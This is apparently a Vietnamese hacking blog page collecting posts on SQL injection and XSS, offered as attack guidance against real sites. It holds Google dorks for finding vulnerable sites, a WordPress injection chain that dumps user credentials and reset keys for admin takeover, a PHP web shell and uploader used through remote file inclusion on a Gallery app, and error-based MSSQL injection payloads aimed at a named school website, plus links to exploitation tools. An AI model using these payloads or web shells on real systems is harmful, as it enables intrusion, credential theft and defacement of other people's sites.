Loving Blogger Template
Hiển thị các bài đăng có nhãn SQl Injection. Hiển thị tất cả bài đăng

Tool Scan Admin



Sau khi test qua mình thấy khá hay - scan được web mà các tools khác không tìm ra
Dễ sử dụng :)


Download : Tại Đây

Tools Khai thác SQLi - Havij 1.152 Pro-[No-Virus]



Link tải : tại đây

Full Giáo Trình học Python bằng video.

           


Bộ 68 Video sẽ giúp việc học Python trở nên đơn giản

Full List Video học Python : Tại đây

Nguồn Video : Daynhauhoc.com

Bộ ebook đồ sộ cực hay về Hacking.

Bộ ebook đồ sộ cực hay về Hacking, Lập trình và thủ thuật sưu tầm


Nguồn: http://newpctricks.net/tai-nguyen/bo-ebook-do-so-cuc-hay-ve-hacking-lap-trinh-va-thu-thuat-suu-tam-106.html

XSS cơ bản

XSS - Cross Site Scripting, tránh gọi tắt CSS trùng với Cascading Style Sheet. XSS là lỗ hổng của Web Application cho phép hacker chạy client side scripts(đặc biệt Javascript) của họ khi có người khác truy cập trang web.



Trong một cuộc tấn công XSS điển hình, hacker sẽ  đưa mã javascript độc hại của mình vào các trang web hợp pháp. Khi người dùng truy cập vào liên kết đặc biệt có chứa phần mã độc, trang web sẽ thực hiện các javascript độc hại đó. Một lỗ hổng XSS nếu khai thác thành công sẽ cho phép kẻ tấn công  lừa đảo, ăn cắp tài khoản và thậm chí là cài đặt worms.

Ví dụ: Chúng ta hãy tưởng tượng, một hacker đã phát hiện ra lỗ hổng XSS trong Gmail và tiêm script độc hại vào. Khi người dùng truy cập vào các trang web, nó sẽ thực thi kịch bản độc hại. Mã độc này có thể được sử dụng để chuyển hướng người dùng đến trang gmail giả hoặc đánh cắp cookie. Sử dụng cookie này bị đánh cắp, ông có thể đăng nhập vào tài khoản của bạn và thay đổi mật khẩu.
Sẽ dễ dàng hơn để tìm hiểu về XSS nếu bạn có khả năng:

    - Giỏi về  HTML,javascript(Xem thêm).
    - Biết về  HTTP client-Server Architecure.(Xem thêm)
    - Biết thêm về một vài server side programming (php, asp, jsp).



Thực hành XSS:

Hacker sẽ dùng google dork để tìm các site có lỗi hổng XSS, bằng các từ khóa dạng như: “?search=” hay “.php?q=”. Sẽ có rất nhiều kết quả để họ làm mục tiêu và thực hiện tấn công.

Các bạn có thể tự viết đoạn mã như sau, lưu thành file php và chạy ở localhost để test.

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>BASIC XSS TEST</title>
</head>
   
<body>
<form method="post" action="#">
<input type="text" name="query" value="" />
<input type="submit" value="GO" />
<br />

<?php echo $_POST['query']
   
;?>
</body>
</html>

Bắt đầu khai thác, thử nhập 1 giá trị bất kỳ và nhấn nút GO, trang sẽ hiện kết quả ngay bên dưới.



Như định nghĩa của XSS, vậy ta hãy thử nhập vào một đoạn mã javascript thử xem thế nào. Ví dụ:
<script>alert('Quyle - VHB Group')</script>

 Nếu website bị dính lỗ hổng XSS, chúng ta sẽ có kết quả như sau:


Các kiểu XSS cơ bản: Được phân chia thành 2 loại, Non-Persistent XSS và Persistent XSS

Persistent XSS: Chỉ các cuộc tấn công mà mã độc được đưa lên và lưu trữ trong database. Nó hoạt động mọi khi có người truy cập vào trang thể hiện mã. Ví dụ: Khi đăng ký thành viên, phần giới thiệu về bản thân, nếu hacker nhập vào mã XSS, và website không kiểm tra kỹ dữ liệu đầu vào, thì mỗi khi truy cập trang thành viên của hacker đó, bạn sẽ bị khai thác.

Non-Persistent XSS: Chỉ các cuộc tấn công tức thời, mã độc được gắn ngay trên URL, hoặc bằng cách nào đó mà không lưu trữ trong database. Chỉ có tác dụng duy nhất một lần. 

Nguồn: http://quylevhb.blogspot.com/2015/03/xss-co-ban.html#ixzz4ERaRGmco

Phương pháp kiểm tra lỗi XSS

Sử dụng các dork sau để tìm kiếm trên google
inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx
inurl:?keyword=
inurl:?search=​
Check lỗi XSS

 Để check 1 site dính lỗi xss, thông thường ta thêm đoạn script sau
<script>alert(“XSS”)</script> 
 Nếu thấy nó xuất hiện 1 khung thông báo thì site đó đã dính lỗi XSS và attacker có thể sử dụng XSS để chiếm quyền điều khiển hay thực thi những mục đích khác. 


- Tuy nhiên đối với 1 số site cần phải bypass bộ lọc khi thực hiện tấn công bằng XSS.
- Ngoài các đoạn mã script attacker cũng có thể chèn vào các thẻ html như sau:
"><body bgcolor="FF0000"></body>
- Sử dụng các tool scan lỗi site tại đây:  http://quylevhb.blogspot.com/search/label/Tools

Nguồn: http://quylevhb.blogspot.com/2015/03/phuong-phap-kiem-tra-loi-xss.html#ixzz4ERauix7S

Một Số Lệnh Bypass Dạng /?aid=IP

Tuy không biết nó còn hữu dụng hay không nhưng mình đăng lên cho các bạn học hỏi thêm thôi
nếu ai có dịp gặp dạng lỗi giống thế này thì test thử luôn /?aid=IP
-------------------------------------------------------------------------------------------
?aid=-1 union select concat (user_name, 0x3a, user_password, 0x3a, user_email) ,2,3,4 from wp-usera--
------------------------------------------------------------------------------------------
?aid=-1 union select concat(user_login, 0x3a,user_pass,0x3a, user_email),2,3,4 from wp-usera--
------------------------------------------------------------------------------------------
?aid=-1 union select concat(user_login, 0x3a,user_pass,0x3a, user_email),2,3,4 from wp_usera--
------------------------------------------------------------------------------------------
http://xxx.xx/xxx/xxxx/
?aid=-1 union select concat(user_activation_key),2,3,4 from wp_usera--
(gõ lệnh này sau khi nhập gmail xác nhận đổi pass ở lệnh thứ 3)
nó sẽ hiện ra 1 key xác nhận
------------------------------------------------------------------------------------------
http://xxx.xx/xx/
wp-login.php?acction=rp&key=gõ key xác nhận đó vào
------------------------------------------------------------------------------------------
bước cuối cùng là đổi pass
-----------------------------------------------------------------------------------------
không biết nó còn hữu dụng hay không nhưng cách này có thể hack dc trang web
tuy tôi chưa test ma2cung4 chả biết nó là lỗi gì
-----------------------------------------------------------------------------------------
ví dụ cụ thể
www.test.it/site/media-gallery/?aid=1
ta sẽ có các lệnh như sau:
---------------------------------------------------------------------------------------
*
www.test.it/site/media-gallery/
?aid=-1 union select concat (user_name, 0x3a, user_password, 0x3a, user_email) ,2,3,4 from wp-usera--
*
www.test.it/site/media-gallery/
?aid=-1 union select concat(user_login, 0x3a,user_pass,0x3a, user_email),2,3,4 from wp-usera--
*
www.test.it/site/media-gallery/
?aid=-1 union select concat(user_login, 0x3a,user_pass,0x3a, user_email),2,3,4 from wp_usera--
*
lúc này nó sẽ ra gmail và tài khoản để login nhưng tài khoản vẩn chưa được giải mã
*
tiếp tục vào trang admin và bấm vào tôi quên mật khẩu rồi xác nhận và bấm tiếp lệnh
www.test.it/site/media-gallery/
?aid=-1 union select concat(user_activation_key),2,3,4 from wp_usera--
*
Sau gõ link này vào nó sẽ hiện lên cho bạn một key xác nhận để đổi mật khẩu mà không cần thông qua gmail
Ví dụ key: GU4Stt0zKGWzl8siEjJh
*
sau khi có key bạn vào trang admin và gõ
www.test.it/site/media-gallery/
wp-login.php?acction=rp&key=GU4Stt0zKGWzl8siEjJh
*
Và Thế là một giao diện đối mật khẩu hiện ra
bạn chỉ cần bấm mật khẩu mới và xác nhận mật khẩu xong bấm ok
Coi như bạn đã nằm được quyền điều hành 1 trang web 
có thể là của WP hay web thường

Kỹ Thuật Hack Web Thông Qua Lỗi Gallery ( Một Dạng Của Lỗi Php Code Inject )

★ Gallery là một công cụ cho phép tạo một gallery ảnh trên web được viết bằng PHP , lợi dụng sơ hở này ta có thể lợi dụng để viết thêm vào đó một mã PHP cho phép ta upload , đó chính là mục đích chính của ta . 
_ Trước hết bạn hãy đăng ký một host miễn phí , tốt nhất là bạn đăng ký ở brinkster.com cho dễ . Sau đó bạn mở notepad và tạo file PHP với đoạn mã sau :
CODE 
<?php 
global $PHP_SELF; 
echo `` 
<form method=post action=$PHP_SELF?$QUERY_STRING > 
<input type=text name=shell size=40 > 
<input type=hidden name=act value=shell > 
<input type=submit value=Go name=sm > 
``; 
set_magic_quotes_runtime(1); 
if ($act == ``shell``) { 
echo ``\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n < xmp > ``; 
system($shell); 
echo ``
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n`` ; } 
echo `` ``; 
? >

Đoạn mã này bạn hãy tạo làm 2 file có tên khác nhau ( nhưng cùng chung một mã ) và đặt tên là : 
shellphp.php : file này dùng để chạy shell trên victim host . 
init.php : file này dùng để upload lên trang có host bạn vừa tạo . ( Bạn hãy upload file init.php này lên sớm vì ta sẽ còn sử dụng nó nhưng với đoạn mã khác , bạn quên upload file này lên là tiêu )
Bạn hãy tạo thêm một file PHP với mã sau :
CODE 
<?php 
function handleupload() { 
if (is_uploaded_file($_FILES[`userfile`][`tmp_name`])) { 
$filename = $_FILES[`userfile`][`tmp_name`]; 
print ``$filename was uploaded successfuly``; 
$realname = $_FILES[`userfile`][`name`]; 
print ``realname is $realname\n``; 
print ``copying file to uploads dir ``.$realname; 
copy($_FILES[`userfile`][`tmp_name`],*PATH*.$realna me); // lưu ý *PATH* chúng ta sẽ thay đổi sau 
} else { 
echo ``Possible file upload attack: filename``.$_FILES[`userfile`][`name`].``.``; 


if ($act == ``upload``) { 
handleupload(); 

echo `` 
<form ENCTYPE=multipart/form-data method=post action=$PHP_SELF?$QUERY_STRING > 
File:<INPUT TYPE=FILE NAME=userfile SIZE=35 > 
<input type=hidden name=MAX_FILE_SIZE value=1000000 > 
<input type=hidden name=act value=upload > 
<input type=submit value=Upload name=sm >
``; 
? >

Bạn hãy đặt tên là upload.php , nó sẽ dùng để upload lên trang Web của nạn nhân . 
_ Tiếp theo Bạn vào Google, gõ ``Powered by gallery`` rồi enter, Google sẽ liệt kê một đống những site sử dụng Gallery , bạn hãy chọn lấy một trang bất kỳ rồI dùng link sau để thử xem nó còn mắc lỗI Gallery hay không :
http:// trang Web của nạn nhân > /gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/ /
Nếu bạn thấy hiện lên một ô hình chữ nhật ở phía trên cùng , bên phải của nó là ô lệnh chuyển tiếp có chữ “Go” là coi như bạn đã tìm thấy được đốI tượng rồi đó . Bây giờ bạn đã có thể gõ lệnh thông qua ô chữ nhật đó để hack Web của nạn nhân . 
Trước hết bạn hãy gõ lệnh “pwd” để xác định đường dẫn tuyệt đối đến thư mục hiện thời rồi nhấn nút “Go” , khi nó cho kết quả bạn hãy nhanh chóng ghi lại đường dẫn ở phía dướI ( Tôi sẽ sử dụng VD đường dẫn tôi tìm thấy là “/home/abc/xyz/gallery” ). 
Sau đó bạn đánh tiếp lệnh “|s –a|” để liệt kê các thư mục con của nó . Bây giờ bạn hãy nhìn kết quả , bạn sẽ thấy một đống các thư mục con mà ta đã liệt kê . Bạn hãy luôn nhớ là mục đích của chúng ta là tìm một thư mục có thể dùng để upload file upload.php mà ta đã chuẩn bị từ trước do đó bạn hãy xác định cùng tôi bằng cách nhìn vào những chữ cuốI cùng của mỗi hàng kết quả : 
Bạn hãy loại bỏ trường hợp các thư mục mà có dấu “.” hoặc “..” vì đây là thư mục gốc hoặc là thư mục ảo ( Nó thường được xếp trên cùng của các hàng kết quả ) . 
Bạn cũng loạI bỏ những hàng có chữ cuối cùng có gắn đuôi ( VD như config.php , check.inc .v.v… ) vì đây là những file chứ không phải là thư mục . 
Còn lại là những thư mục có thể upload nhưng tôi khuyên bạn nên chọn những hàng chứa tên thư mục mà có chứa số lớn hơn 1 ( Bạn có thể xác định được chúng bằng cách nhìn cột thứ 2 từ trái sang ) , vì như vậy vừa chắc chắn đây là thư mục không phải thư mục ảo , vừa làm cho admin của trang Web đó khó phát hiện khi ta cài file của ta vào . Tôi VD tôi phát hiện ra thư mục “loveyou” có chứa 12 file có thể cho ta upload , như vậy đường dẫn chính thức mà ta upload lên sẽ là :
/home/abc/xyz/Gallery/loveyou
Bây giờ bạn hãy vào account host của bạn, sửa nội dung file init.php giống như mã của file upload.php, nhưng sửa lại *PATH* thành “/home/abc/xyz/gallery/loveyou/ ”. Đồng thời cũng chuẩn bị một file upload.php trên máy của bạn với *PATH* là “” ( 2 dấu ngoặc kép ). 
Bây giờ là ta đã có thể upload file upload.php lên trang Web của nạn nhân được rồi , bạn hãy nhập địa chỉ sau trên trình duyệt Web của bạn :
http:// trang Web của nạn nhân > /gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/ /
Bạn sẽ thấy xuất hiện tiếp một khung hình chữ nhật và bên cạnh là có 2 nút lệnh , một là nút “brown” , một là nút “upload” . Nút “brown” bạn dùng để dẫn đến địa chỉ file upload.php bạn đã chuẩn bị trên máy của bạn , nút “upload” khi bạn nhấn vào đó thì nó sẽ upload file upload.php lên trang Web của nạn nhân . Ok , bây giờ coi như bạn đã hoàn thành chặng đường hack Web rồi đó . Từ bây giờ bạn hãy vận dụng để tấn công đối thủ như lấy database , password ( làm tương tự như các bài hướng dẫn hack trước ) , nhưng các bạn chỉ nên thực tập chứ đừng xoá database hay phá Web của họ. Nếu là một hacker chân chính các bạn chỉ cần upload lên trang Web dòng chữ : “Hack by ……..” là đủ rồi . 
Cũng như những lần trước , các bạn có thành công hay không cũng tuỳ thuộc vào sự may mắn và kiên trì nghiên cứu vận dụng kiến thức của các bạn

Tôn Trọng Người Viết Copy Nhớ Ghi Nguồn !

Khai Thác Website Dạng Lỗi Aspx

 HÔM NAY TÔI SẺ HƯỚNG DẨN CÁC BẠN KHAI THÁC LỔI SQL DẠNG ASPX

- Phần mền bổ trợ : HACK BAR : ta vào Mozilla Firefox tải về nhá .. ▼
- Đây là những câu lệnh để các bạn tham khổ qua video .chúng ta có thể áp dụng nó để khai thác 1 cách dể dàng hơn :
  victim http://thptnguyenthaibinh.edu.vn

' and 1=convert(int,@@version))-- - (version)
'and 1=convert(int,db_name()))-- -  (database)
' and 1=convert(int,(select top 1 table_name from information_schema.tables)))-- -
ta thêm where table_name not in('table vừa tìm được') sau chử tables.. để tiềm thêm các table(table bên cạnh)
(lưu ý) nếu như chưa có table chúng ta cần thì tiếp tục theo vào và nhớ thêm dấu , khi khai thác các table tiếp theo
-- nhìn kỷ đoạn này nhá ..vì rất là dể quên à--
'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('table cần khai thác'))))-- -
vd như nảy ta ckeck dc tbuser thì thêm vào đó là ('tbuser')
nếu ta mún khai thác cloum cạnh bên thì thêm and column_name not in ('cái mới vừa được khai thác'))))-- - 
giờ tìm user nhá 'and 1=convert(int,(select top 1 ten from tbuser)))-- -
-- nhớ kỷ (ten) và (user) nha.. ghi theo cái mà ta khai thác được  

                                  ------------------------CHÚC CÁC BẠN THÀNH CÔNG---------------------